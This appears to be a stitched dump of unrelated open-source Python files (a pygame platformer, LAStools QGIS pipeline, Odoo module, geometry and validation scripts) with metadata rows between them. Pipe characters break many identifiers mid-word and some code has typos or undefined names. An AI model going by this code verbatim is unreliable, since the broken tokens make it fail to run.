# David Art <david.madbox@gmail.com>
# Program Arcade Games With Python And Pygame - Build a Platformer
# http://programarcadegames.com
import pygame
import random
WIDTH = 640
HEIGHT = 480
class Platform (pygame.sprite.Sprite):
def __init__(self, width, height):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load('images/block.png')
self.rect = self.image.get_rect()
class Raspberry(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
| self.image = pygame.image.load('images/raspberry.png')
self.rect = self.image.get_rect()
class Player(pygame.sprite.Sprite):
change_x = 0
change_y = 0
jump_ok = True
frame_since_collision = 0
def __init__(self, x, y):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load('images/player.png')
self.rect = self.image.get_re | ct()
self.rect.x = x
self.rect.y = y
def update(self,blocks, raspberries):
self.rect.x += self.change_x
# check collision with raspberries
block_hit_list = pygame.sprite.spritecollide(self, raspberries, False)
for raspberry in block_hit_list:
raspberries.remove(raspberry)
# check collision with platform
block_hit_list = pygame.sprite.spritecollide(self, blocks, False)
for block in block_hit_list:
# If we are moving right, set our right side to the left side of the item we hit
if self.change_x > 0:
self.rect.right = block.rect.left
else:
# Otherwise if we are moving left, do the opposite.
self.rect.left = block.rect.right
self.rect.y += self.change_y
block_hit_list = pygame.sprite.spritecollide(self, blocks, False)
for block in block_hit_list:
if self.change_y > 0:
self.jump_ok = True
# Keep track of the last time we hit something
self.frame_since_collision = 0
# Reset our position based on the top/bottom of the object.
if self.change_y > 0:
self.rect.bottom = block.rect.top
else:
self.rect.top = block.rect.bottom
# Stop our vertical movement
self.change_y = 0
# If we haven't hit anything in a while, allow us jump
if self.frame_since_collision > 2:
self.jump_ok = False
# Increment frame counter
self.frame_since_collision += 1
# Calculate effect of gravity.
def calc_grav(self):
self.change_y += .4
# See if we are on the ground.
if self.rect.y >= HEIGHT-48 and self.change_y >= 0:
self.change_y = 0
self.rect.y = HEIGHT-48
self.frame_since_collision = 0
self.jump_ok = True
# Called when user hits 'jump' button
def jump(self,blocks):
# If it is ok to jump, set our speed upwards
if self.jump_ok:
self.change_y = -9.81
class Game():
def __init__(self, width=640, height=480, fullscreen=False):
self.width = width
self.height = height
if fullscreen:
flags = pygame.FULLSCREEN
else:
flags = 0
pygame.init()
self.screen = pygame.display.set_mode([width, height], flags, 32)
pygame.display.set_caption("RaspJam")
self.scene = Scene()
bself.lock_list = pygame.sprite.Group()
self.all_sprites_list = pygame.sprite.Group()
self.raspberry_list = pygame.sprite.Group()
create_level1(self.block_list, self.all_sprites_list)
self.player = Player(32, 32)
self.player.rect.x = 240
self.player.rect.y = 0
self.all_sprites_list.add(self.player)
def update(self):
pass
def draw(self):
pass
class Scene:
def __init__(self):
self.image = pygame.image.load('images/bg.png')
def draw(self, screen):
screen.blit(self.image, (0, 0))
# Create platforms
def create_level1(block_list, all_sprites_list):
block = Platform(128, 16)
block.rect.x = 160
block.rect.y = 128
block_list.add(block)
all_sprites_list.add(block)
block = Platform(128, 16)
block.rect.x = 352
block.rect.y = 128
block_list.add(block)
all_sprites_list.add(block)
block = Platform(128, 16)
block.rect.x = 0
block.rect.y = 432
block_list.add(block)
all_sprites_list.add(block)
block = Platform(128, 16)
block.rect.x = WIDTH - 128
block.rect.y = 432
block_list.add(block)
all_sprites_list.add(block)
block = Platform(128, 16)
block.rect.x = 0
block.rect.y = 240
block_list.add(block)
all_sprites_list.add(block)
block = Platform(128, 16)
block.rect.x = WIDTH - 128
block.rect.y = 240
block_list.add(block)
all_sprites_list.add(block)
block = Platform(128, 16)
block.rect.x = 160
block.rect.y = 336
block_list.add(block)
all_sprites_list.add(block)
block = Platform(128, 16)
block.rect.x = 352
block.rect.y = 336
block_list.add(block)
all_sprites_list.add(block)
# Initialize the window
pygame.init()
# Set the height and width of the screen
screen = pygame.display.set_mode([WIDTH, HEIGHT], 0, 32)
pygame.display.set_caption("RaspJam")
background = pygame.image.load('images/bg.png')
# Main program, create the blocks
block_list = pygame.sprite.Group()
all_sprites_list = pygame.sprite.Group()
raspberry_list = pygame.sprite.Group()
create_level1(block_list,all_sprites_list)
player = Player(32, 32)
player.rect.x = 240
player.rect.y = 0
all_sprites_list.add(player)
for i in range(16):
# This represents a block
block = Raspberry()
# Set a random location for the block
block.rect.x = random.randrange(WIDTH/92)* 92
block.rect.y = random.randrange(HEIGHT/92)* 92
# Add the block to the list of objects
raspberry_list.add(block)
#~ all_sprites_list.add(block)
#Loop until the user clicks the close button.
done = False
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
# -------- Main Program Loop -----------
while not done:
# --- Event Processing
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
done = True
if event.key == pygame.K_LEFT:
player.change_x = -6
if event.key == pygame.K_RIGHT:
player.change_x = 6
if event.key == pygame.K_SPACE:
player.jump(block_list)
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT:
player.change_x = 0
if event.key == pygame.K_RIGHT:
player.change_x = 0
# --- Game Logic
# Wrap player around the screen
if player.rect.x >= WIDTH:
player.rect.x = -15
if player.rect.x <= -16:
player.rect.x = WIDTH
player.calc_grav()
player.update(block_list, raspberry_list)
block_list.update()
# --- Draw Frame
#~ screen.fill(BLACK)
screen.blit(background, (0, 0))
all_sprites_list.draw(screen)
raspberry_list.draw(screen)
pygame.display.flip()
clock.tick(60)
pygame.quit ()
|
davidrpugh/pyCollocation | pycollocation/solvers/solutions.py | Python | mit | 1,746 | 0.000573 | """
Classes for representing solutions to boundary value problems.
@author : davidrpugh
"""
class SolutionLike(object):
@property
def basis_kwargs(self):
return self._basis_kwargs
@property
def functions(self):
return self._functions
@property
def nodes(self):
return self._nodes
@property
def problem(self):
return self._problem
@property
def residual_function(self):
return self._residual_function
@property
def result(self):
return self._result
class Solution(SolutionLike):
"""Class representing the solution to a Boundary Value Problem (BVP)."""
def __init__(self, basis_kwargs, functions, nodes, problem, residual_function, result):
"""
Initialize an instance of the Solution class.
Parameters
----------
basis_kwargs : dict
functions : list
nodes : numpy.ndarray
problem : TwoPointBVPLike
residual_function : callable
result : OptimizeResult
"""
self._bas | is_kwargs = basis_kwargs
self._functions = functions
self._nodes = nodes
self._problem = | problem
self._residual_function = residual_function
self._result = result
def evaluate_residual(self, points):
return self.residual_function(points)
def evaluate_solution(self, points):
return [f(points) for f in self.functions]
def normalize_residuals(self, points):
"""Normalize residuals by the level of the variable."""
residuals = self.evaluate_residual(points)
solutions = self.evaluate_solution(points)
return [resid / soln for resid, soln in zip(residuals, solutions)]
|
thor/django-localflavor | localflavor/uy/util.py | Python | bsd-3-clause | 350 | 0 | # -*- coding: utf-8 -*-
def get_validation_digit(number):
"""Calculates the validation di | git for the given number."""
weighted_sum = 0
dvs = [4, 3, 6, 7, 8, 9, 2]
number = str(number)
for i in range(0, len(number)):
weighted_sum = (int(number[-1 - i]) * dvs[i] + weighted_sum) % 10
return (10 - we | ighted_sum) % 10
|
herow/planning_qgis | python/plugins/processing/algs/lidar/lastools/flightlinesToDTMandDSM.py | Python | gpl-2.0 | 6,225 | 0.002088 | # -*- coding: utf-8 -*-
"""
***************************************************************************
flightlinesToDTMandDSM.py
---------------------
Date : April 2014
Copyright : (C) 2014 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'May 2014'
__copyright__ = '(C) 2014, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterSelection
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterString
class flightlinesToDTMandDSM(LAStoolsAlgorithm):
TILE_SIZE = "TILE_SIZE"
BUFFER = "BUFFER"
TERRAIN = "TERRAIN"
TERRAINS = ["wilderness", "nature", "town", "city", "metro"]
BASE_NAME = "BASE_NAME"
def defineCharacteristics(self):
self.name = "flightlinesToDTMandDSM"
self.group = "LAStools Pipelines"
self.addParametersPointInputFolderGUI()
self.addParameter(ParameterNumber(flightlinesToDTMandDSM.TILE_SIZE,
self.tr("tile size (side length of square tile)"),
0, None, 1000.0))
self.addParameter(ParameterNumber(flightlinesToDTMandDSM.BUFFER,
self.tr("buffer around each tile (avoids edge artifacts)"),
0, None, 25.0))
self.addParameter(ParameterSelection(flightlinesToDTMandDSM.TERRAIN,
self.tr("terrain type"), flightlinesToDTMandDSM.TERRAINS, 1))
self.addParametersStepGUI()
self.addParametersTemporaryDirectoryGUI()
self.addParametersOutputDirectoryGUI()
self.addParameter(ParameterString(flightlinesToDTMandDSM.BASE_NAME,
self.tr("tile base name (using 'sydney' creates sydney_274000_4714000...)"), "tile"))
self.addParametersRasterOutputFormatGUI()
self.addParametersCoresGUI()
self.addParametersVerboseGUI()
def processAlgorithm(self, progress):
# first we tile the data
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lastile")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputFolderCommands(commands)
commands.append("-files_are_flightlines")
tile_size = self.getParameterValue(flightlinesToDTMandDSM.TILE_SIZE)
commands.append("-tile_size")
commands.append(str(tile_size))
buffer = self.getParameterValue(flightlinesToDTMandDSM.BUFFER)
if buffer != 0.0:
commands.append("-buffer")
commands.append(str(buffer))
self.addParametersTemporaryDirectoryAsOutputDirectoryCommands(commands)
base_name = self.getParameterValue(flightlinesToDTMandDSM.BASE_NAME)
if base_name == "":
base_name = "tile"
commands.append("-o")
commands.append(base_name)
commands.append("-olaz")
LAStoolsUtils.runLAStools(commands, progress)
# then we ground classify the tiles
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasground")]
self.addParametersVerboseCommands(commands)
self.addParametersTemporaryDirectoryAsInputFilesCommands(commands, base_name+"*.laz")
method = self.getParameterValue(flightlinesToDTMandDSM.TERRAIN)
if method != 1:
commands.append("-" + flightlinesToDTMandDSM.TERRAINS[method])
if method > 2:
commands.append("-ultra_fine")
elif method > 1:
commands.append("-extra_fine")
elif method > 0:
commands.append("-fine")
self.addParametersTemporaryDirectoryAsOutputDirectoryCommands(commands)
commands.append("-odix")
commands.append("_g")
commands.append("-olaz")
self.addParametersCoresCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
# then we rasterize the classified tiles into DTMs
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "las2dem")]
self.addParametersVerboseCommands(commands)
self.addParametersTemporaryDirectoryAsInputFilesCommands(commands, base_name+"*_g.laz")
commands.append("-keep_class")
commands.append("2")
self.addParametersStepCommands(commands)
commands.append("-use_tile_bb")
self.addParametersOutputDirectoryCommands(commands)
commands.append("-ocut")
commands.append("2")
commands.append("-odix")
commands.append("_dtm")
self.addParametersRasterOutputFormatCommands(commands)
self.addParametersCoresCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
# then we rasterize the classified tiles into DSMs
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "las2dem")]
self.addParametersVerboseCommands(commands)
| self.addParametersTemporaryDirectoryAsInputFilesCommands(commands, base_name+"*_g.laz")
commands.append("-first_only")
self.addParametersStepCommands(commands)
commands.append("-use_tile_bb")
self.addParametersOutputDirectoryCommands(commands)
commands.append("-ocut")
commands.append("2")
commands.append("-odix")
commands.append("_dsm")
self.addParametersR | asterOutputFormatCommands(commands)
self.addParametersCoresCommands(commands)
LAStoolsUtils.runLAStools(commands, progress)
|
jackey-qiu/genx_pc_qiu | geometry_modules/trigonal_pyramid_distortion_B.py | Python | gpl-3.0 | 12,062 | 0.044354 | import numpy as np
from numpy.linalg import inv
import os
#the original version has been saved as B3 just in case
#here only consider the distortion caused by length difference of three edges, it is a tectrahedral configuration basically, but not a regular one
#since the top angle can be any value in [0,2*pi/3]
x0_v,y0_v,z0_v=np.array([1.,0.,0.]),np.array([0.,1.,0.]),np.array([0.,0.,1.])
#anonymous function f1 calculating transforming matrix with the basis vector expressions,x1y1z1 is the original basis vector
#x2y2z2 are basis of new coor defined in the original frame,new=T.orig
f1=lambda x1,y1,z1,x2,y2,z2:np.array([[np.dot(x2,x1),np.dot(x2,y1),np.dot(x2,z1)],\
[np.dot(y2,x1),np.dot(y2,y1),np.dot(y2,z1)],\
[np.dot(z2,x1),np.dot(z2,y1),np.dot(z2,z1)]])
#f2 calculate the distance b/ p1 and p2
f2=lambda p1,p2:np.sqrt(np.sum((p1-p2)**2))
#anonymous function f3 is to calculate the coordinates of basis with magnitude of 1.,p1 and p2 are coordinates for two known points, the
#direction of the basis is pointing from p1 to p2
f3=lambda p1,p2:(1./f2(p1,p2))*(p2-p1)+p1
#refer the the associated ppt file when read the comments
basis=np.array([5.038,5.434,7.3707])
#atoms to be checked for distance
#for half layer
atms_cell=[[0.653,1.112,1.903],[0.847,0.612,1.903],[0.306,0.744,1.75],[0.194,0.243,1.75],\
[0.5,1.019,1.645],[0,0.518,1.645],[0.847,0.876,1.597],[0.653,0.375,1.597]]
#for full layer
#atms_cell=[[0.153,1.062,2.113],[0.347,0.563,2.113],[0.653,1.112,1.903],[0.847,0.612,1.903],[0,0.9691,1.855],[0.5,0.469,1.855],[0.306,0.744,1.75],[0.194,0.243,1.75],\
#[0.5,1.019,1.645],[0,0.518,1.645],[0.847,0.876,1.597],[0.653,0.375,1.597]]
atms=np.append(np.array(atms_cell),np.array(atms_cell)+[-1,0,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[1,0,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[0,-1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[0,1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[1,1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[-1,-1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[1,-1,0],axis=0)
atms=np.append(atms,np.array(atms_cell)+[-1,1,0],axis=0)
atms=atms*basis
O1,O2,O3,O4=[0.653,1.1121,1.903]*basis,[0.847,0.6121,1.903]*basis,[0.306,0.744,1.75]*basis,[0.194,0.243,1.75]*basis
class trigonal_pyramid_distortion():
def __init__(self,p0=[0.,0.,0.],p1=[2.,2.,2.],ref=None,top_angle=1.0,len_offset=[0.,0.]):
#top angle is p0_A_p1 in ppt file, shoulder_angle is A_P0_CP
#len_offset[0] is CP_P1 in ppt, the other one not specified in the file
self.top_angle=top_angle
self.shoulder_angle=(np.pi-top_angle)/2.
self.p0,self.p1=np.array(p0),np.array(p1)
self.len_offset=len_offset
self.ref=ref
def cal_theta(self):
#here theta angle is angle A_P0_P1 in ppt file
dst_p0_p1=f2(self.p0,self.p1)
right_l=self.len_offset[0]*np.sin(self.shoulder_angle)
self.theta=self.shoulder_angle+np.arcsin(right_l/dst_p0_p1)
return self.theta
def cal_edge_len(self):
#cal the edge length of regular hexahedra
#sharp angle is angle A_P1_P0 in ppt file(2nd slide)
#rigth_side is the length of p2p5 in ppt file(1st slide)
self.sharp_angle=np.pi-self.top_angle-self.theta
right_side=f2(self.p0,self.p1)*np.sin(self.sharp_angle)
self.edge_len=right_side/np.sin(np.pi-self.top_angle)
def cal_apex_coor(self,switch=False,phi=0.,mirror=False):
#basis idea: set a new coordinate frame with p0p1 as the z vector (start from p1)
#set a arbitrary y vector on the normal plane, and cross product to solve the x vector
#then use phi and theta (sharp angle) to solve the cross_point(CP on file) and apex (A on file)
#note phi is in range of [0,2pi]
p0,p1=self.p0,self.p1
if switch==True:
p0,p1=self.p1,self.p0
n_v=p0-p1
origin=p1
a,b,c=n_v[0],n_v[1],n_v[2]
x0,y0,z0=p1[0],p1[1],p1[2]
ref_p=0
if c==0:
ref_p=p1+[0,0,1]
elif self.ref!=None:
ref_p=np.cross(p0-p1,np.cross(p0-p1,self.ref-p1))+p1
else:
ref_p=np.array([1.,1.,(a*(x0-1.)+b*(y0-1.))/c+z0])
#elif b!=0.:
# ref_p=np.array([1.,(a*(x0-1.)+c*(z0-1.))/b+y0,1.])
#else:
# ref_p=np.array([(b*(y0-1.)+c*(z0-1.))/a+x0,1.,1.])
x_v=f3(np.zeros(3),(ref_p-origin))
z_v=f3(np.zeros(3),(p0-origin))
y_v=np.cross(z_v,x_v)
T=f1(x0_v,y0_v,z0_v,x_v,y_v,z_v)
r1=self.len_offset[0]
r2=self.len_offset[0]+self.edge_len
theta=self.sharp_angle
cross_pt_new = np.array([r1*np.cos(phi)*np.sin(theta),r1*np.sin(phi)*np.sin(theta),r1*np.cos(theta)])
apex_new = np.array([r2*np.cos(phi)*np.sin(theta),r2*np.sin(phi)*np.sin(theta),r2*np.cos(theta)])
self.cross_pt = np.dot(inv(T),cross_pt_new)+origin
self.apex = np.dot(inv(T),apex_new)+origin
self.cal_p2(p0,p1,mirror)
def cal_p2(self,p0,p1,mirror=False):
#basic idea:set z vector rooting from EC to cp, x vector from EC to A (normalized to length of 1)
#use angle of theta (pi/2 here) and phi (the angle A_EC_P2, can be calculated) to sove P2 finally
#if consider mirror then p2 will be on the other side
#note this only work for cases without angle offset
side_center=(p0+self.cross_pt)/2.
origin=side_center
z_v=f3(np.zeros(3),(self.cross_pt-side_center))
x_v=f3(np.zeros(3),(self.apex-side_center))
y_v=np.cross(z_v,x_v)
T=f1(x0_v,y0_v,z0_v,x_v,y_v,z_v)
theta=np.pi/2
dst_face_ct_edge_ct=f2(p0,self.cross_pt)/2*np.tan(np.pi/6.)
dst_p2_edge_ct=f2(p0,self.cross_pt)/2*np.tan(np.pi/3.)
phi=np.arccos(dst_face_ct_edge_ct/f2(self.apex,(p0+self.cross_pt)/2.))
if mirror:phi=-phi
r=dst_p2_edge_ct
p2_new=np.array([r*np.cos(phi)*np.sin(theta),r*np.sin(phi)*np.sin(theta),r*np.cos(theta)])
_p2=np.dot(inv(T),p2_new)+origin
_p2_v=_p2-self.apex
#scale to the shorter length between apex and p0 or p1
scale=(min([f2(self.p0,self.apex),f2(self.p1,self.apex)])+self.len_offset[1])/f2(_p2,self.apex)
p2_v=_p2_v*scale
self.p2=p2_v+self.apex
def all_in_all(self,switch=False,phi=0.,mirror=False):
self.cal_theta()
self.cal_edge_len()
self.cal_apex_coor(switch=switch, phi=phi,mirror=mirror)
def print_file(self,file):
f=open(file,'w')
s = '%-5s %7.5e %7.5e %7.5e\n' % ('Pb', self.apex[0],self.apex[1],self.apex[2])
f.write(s)
s = '%-5s %7.5e %7.5e %7.5e\n' % ('O', self.p0[0],self.p0[1],self.p0[2])
f.write(s)
s = '%-5s %7.5e %7.5e %7.5e\n' % ('O', self.p1[0],self.p1[1],self.p1[2])
f.write(s)
s = '%-5s %7.5e %7.5e %7.5e\n' % ('O', s | elf.p2[0],self.p2[1],self.p2[2])
f.write(s)
f.close()
#steric_check will check the steric feasibility by changing the rotation angle (0-2pi) and top angle (0-2pi/3)
#the dist bw sorbate(both metal and oxygen) and atms (defined on top | ) will be cal and compared to the cutting_limit
#higher cutting limit will result in more items in return file (so be wise to choose cutting limit)
#the container has 9 items, ie phi (rotation angle), top_angle, low_dis, apex coors (x,y,z), os coors(x,y,z)
#in which the low_dis is the lowest dist between sorbate and atm (averaged value)
class steric_check(trigonal_pyramid_distortion):
def __init__(self,p0=O1,p1=O3,len_offset=[0.,0.],cutting_limit=3.):
self.p0,self.p1=np.array(p0),np.array(p1)
self.len_offset=len_offset
self.cutting_limit=cutting_limit
self.container=np.zeros((1,9))[0:0]
def steric_check(self,top_ang_res=0.1,phi_res=0.5,switch=False,mirror=False,print_path=None):
for top in np.arange(1.,2.0,top_ang_res):
for phi in np.arange(0,np.pi*2,phi_res):
self.top_angle=top
self.shoulder_angle=(np.pi-top)/2. |
sysadminmatmoz/odoo-clearcorp | account_banking_ccorp/bank_statement.py | Python | agpl-3.0 | 3,896 | 0.00308 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2009 EduSense BV (<http://www.edusense.nl>).
# All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
##############################################################################
# Collaboration by:
# CLEARCORP S.A.- Copyright (C) 2009-TODAY
# (<http://clearcorp.co.cr>).
###############################################################################
from openerp.osv import osv, fields
from openerp.tools.translate import _
class accountBankStatement(osv.Model):
'''
Extensions from account_bank_statement:
1. Removed period_id (transformed to optional boolean) - as it is no
longer needed.
NB! because of #1. changes required to account_voucher!
2. Extended 'button_confirm' trigger to cope with the period per
statement_line situation.
3. Added optional relation with imported statements file
4. Ordering is based on auto generated id.
'''
_inherit = 'account.bank.statement'
def _check_company_id(self, cr, uid, ids, context=None):
"""
Adapt this constraint method from the account module to reflect the
move of period_id to the statement line
"""
for statement in self.browse(cr, uid, ids, context=context):
if (statement.period_id and
statement.company_id.id != statement.period_id.company_id.id):
return False
return True
def _end_balance(self, cursor, user, ids, name, attr, context=None):
"""
This method taken from account/account_bank_statement.py and
altered to take the statement line subflow into account
"""
res = {}
statements = self.browse(cursor, user, ids, context=context)
for statement in statements:
res[statement.id] = statement.balance_start
# Calculate the balance based on the statement line amounts
# ..they are in the statement currency, no conversion needed.
for line in statement.line_ids:
res[statement.id] += line.amount
for r in res:
res[r] = round(res[r], 2)
return res
_constraints = [
(_check_company_id, 'The journal and period chosen have to belong'
' to the same company.', ['journal_id','p | eriod_id']),
]
_columns = {
# override this field *only* to replace the
# function method with the one from this module.
# Note that it is defined twice, both in
# account/account_bank_statement.py (witho | ut 'store') and
# account/account_cash_statement.py (with store=True)
'balance_end': fields.function(_end_balance, method=True,
store=True, string='Balance'),
'banking_id': fields.many2one('account.banking.ccorp.imported.file',
'Imported File', readonly=True),
} |
rutgers-apl/alive-loops | debug_count.py | Python | apache-2.0 | 1,582 | 0.017699 | '''Find all 2-cycles.
'''
from loops import *
import traceback
import logging
logging.basicConfig(filename='debug_count.log', filemode='w', level=logging.WARNING)
sys.stderr.write('reading master.opt\n')
opts = parse_transforms(open('master.opt').read())
#opts = opts[0:1]
#opts = opts[0:40]
sys.stderr.write('%s optimizations\n' % len(opts))
count = 0
increasing = 0
unsat = 0
loops = 0
errors = [0]
def count_error(*a):
errors[0] += 1
for i1 in range(0,len(opts)):
o1 = opts[i1]
for i1 in range(i1+1,len(opts)):
try:
for o3 in all_bin_compositions(o1,o2, count_error):
o3_src = sum(1 for v in o3.src.itervalues() if isinstance(v, Instr))
#o3c = o3.copy()
for oo in all_bin_compositions(o3, o3, count_error):
count += 1
oo_src = sum(1 for v in oo.src.itervalues() if isinstance(v, Instr))
sys.stderr.wr | ite('\rTested: ' + str(count))
sys. | stdout.flush()
if o3_src < oo_src:
increasing += 1
continue
if satisfiable(oo):
print '\n-----\nLoop: ', o3.name
o1.dump()
print
o2.dump()
print
o3.dump()
loops += 1
else:
unsat += 1
except Exception, e:
logging.exception('combining <%s> <%s>', o1.name, o2.name)
errors[0] += 1
sys.stderr.write('\n')
print
print '----'
print 'final count', count
print 'loops', loops
print 'unsat', unsat
print 'increasing', increasing
print 'errors', errors[0] |
plotly/python-api | packages/python/plotly/plotly/validators/layout/scene/zaxis/_zerolinewidth.py | Python | mit | 485 | 0.002062 | im | port _plotly_utils.basevalidators
class ZerolinewidthValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="zerolinewidth", parent_name="layout.scene.zaxis", **kwargs
):
super(ZerolinewidthValidator, self).__init__(
plotly_name=plotly_name,
| parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
role=kwargs.pop("role", "style"),
**kwargs
)
|
ckcollab/ericcarmichael | pelicanconf.py | Python | mit | 1,128 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
AUTHOR = u'Eric Carmichael'
SITENAME = u"Eric Carmichael's Nerdery"
SITEURL = os.environ.get("PELICAN_SITE_URL", "")
TIMEZONE = 'Europe/Paris'
DEFAULT_LANG = u'en'
# Feed generation is usually not desired when developing
FEED_ALL_ATOM = 'feeds/all.atom.xml'
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
DEFAULT_PAGINATION = 2
# WITH_FUTUR | E_DATES = True
GITHUB_URL = 'http://github.com/ckcollab/'
THEME = "themes/mintheme"
PATH = "content"
PLUGINS = ["plugins.assets", "plugins.sitemap"]
MARKUP = (('rst', 'md', 'html'))
WEBASSETS = True
SITEMAP = {
"format": "xml" | ,
"priorities": {
"articles": 1,
"pages": 1,
"indexes": 0
},
"changefreqs": {
"articles": "daily",
"pages": "daily",
"indexes": "daily",
}
}
STATIC_PATHS = [
'images',
'extra/robots.txt',
]
EXTRA_PATH_METADATA = {
'extra/robots.txt': {'path': 'robots.txt'},
}
# Make the site display full articles instead of summaries by setting this to 0
# SUMMARY_MAX_LENGTH = 0
|
danielparton/ensembler | ensembler/validation.py | Python | gpl-2.0 | 10,250 | 0.003317 | import os
import tempfile
import shutil
import yaml
import mdtraj
from subprocess import Popen, PIPE
from ensembler.core import get_most_advanced_ensembler_modeling_stage, default_project_dirnames
from ensembler.core import model_filenames_by_ensembler_stage, get_valid_model_ids, mpistate
from ensembler.core import YamlDumper, YamlLoader, logger, get_targets
from ensembler.utils import notify_when_done, set_loglevel
# includes types
molprobity_oneline_analysis_colnames = [
('#pdbFileName', None),
('x-H_type', None),
('chains', int),
('residues', int),
('nucacids', int),
('resolution', float),
('rvalue', float),
('rfree', float),
('clashscore', float),
('clashscoreB<40', float),
('minresol', float),
('maxresol', float),
('n_samples', int),
('pct_rank', int),
('pct_rank40', int),
('cbeta>0.25', int),
('numCbeta', int),
('rota<1%', int),
('numRota', int),
('ramaOutlier', int),
('ramaAllowed', int),
('ramaFavored', int),
('numRama', int),
('numbadbonds', int),
('numbonds', int),
('pct_badbonds', float),
('pct_resbadbonds', float),
('numbadangles', int),
('numangles', int),
('pct_badangles', float),
('pct_resbadangles', float),
('MolProbityScore', float),
('Mol_pct_rank', int),
]
molprobity_oneline_analysis_colnames_to_output = [
'MolProbityScore',
'clashscore',
'numRota',
'rota<1%',
'numRama',
'ramaOutlier',
'ramaFavored',
'cbeta>0.25',
'pct_badbonds',
'pct_badangles',
]
@notify_when_done
def molprobity_validation_multiple_targets(targetids=None, modeling_stage=None, loglevel=None):
"""
Calculate model quality using MolProbity ``oneline-analysis`` command.
For each target, this function outputs a text file named
``models/[targetid]/validation_scores_sorted-[method]-[ensembler_stage]`` which contains a list of
targetids sorted by validation score. This can be used by the subsequent ``package_models`` command
to filter out models below a specified quality threshold.
Typically, this should be run after models have been refined to the desired extent (e.g. after
implicit or explicit MD refinement)
More detailed validation results are written to the individual model directories.
MPI-enabled.
Parameters
----------
targetids: list of str or str
modeling_stage: str
{None|build_models|refine_implicit_md|refine_explicit_md}
Default: None (automatically selects most advanced stage)
"""
set_loglevel(loglevel)
if targetids is None:
targetids = [target.id for target in get_targets()]
elif type(targetids) is str:
targetids = [targetids]
for targetid in targetids:
logger.info('Working on target {}'.format(targetid))
molprobity_validation(targetid=targetid, ensembler_stage=modeling_stage, loglevel=loglevel)
def molprobity_validation(targetid, ensembler_stage=None, loglevel=None):
set_loglevel(loglevel)
valid_model_ids = []
if mpistate.rank == 0:
if ensembler_stage is None:
ensembler_stage = get_most_advanced_ensembler_modeling_stage(targetid)
valid_model_ids = get_valid_model_ids(ensembler_stage, targetid)
if ensembler_stage is None:
ensembler_stage = mpistate.comm.bcast(ensembler_stage, root=0)
valid_model_ids = mpistate.comm.bcast(valid_model_ids, root=0)
nvalid_model_ids = len(valid_model_ids)
model_structure_filename = model_filenames_by_ensembler_stage[ensembler_stage]
models_target_dir = os.path.join(default_project_dirnames.models, targetid)
molprobity_results_filepath = os.path.join(
models_target_dir, 'validation_scores_sorted-molprobity-{}'.format(ensembler_stage)
)
molprobity_scores_sublist = []
for model_index in range(mpistate.rank, nvalid_model_ids, mpistate.size):
model_id = valid_model_ids[model_index]
logger.debug('MPI process {} working on model {}'.format(mpistate.rank, model_id))
molprobity_score = run_molprobity_oneline_analysis_and_write_results(
targetid,
model_id,
ensembler_stage,
model_structure_filename=model_structure_filename,
models_target_dir=models_target_dir,
)
molprobity_scores_sublist.append((model_id, molprobity_score))
molprobity_scores_gathered_list = mpistate.comm.gather(molprobity_scores_sublist, root=0)
if mpistate.rank == 0:
molprobity_scores_list_of_tuples = [item for sublist in molprobity_scores_gathered_list for item in sublist]
molprobity_scores_sorted = sorted(molprobity_scores_list_of_tuples, key=lambda x: x[1])
write_molprobity_scores_list(molprobity_scores_sorted, molprobity_results_filepath)
def run_molprobity_oneline_analysis_and_write_results(targetid,
model_id,
ensembler_stage,
model_structure_filename=None,
models_target_dir=None,
check_for_existing_results=True,
):
if model_structure_filename is None:
model_structure_filename = model_filenames_by_ensembler_stage[ensembler_stage]
if models_target_dir is None:
models_target_dir = os.path.join(default_project_dirnames.models, targetid)
results_output_filepath = os.path.join(
models_target_dir, model_id, 'molprobity-{}.yaml'.format(ensembler_ | stage)
)
if check_for_existing_results:
if os.path.exists(results_output_filepath):
with open(results_output_filepath) as results_output_file:
prev_results = yaml.load(stream=results_output_file, Loade | r=YamlLoader)
prev_molprobity_score = prev_results.get('MolProbityScore')
if prev_molprobity_score is not None:
logger.debug(
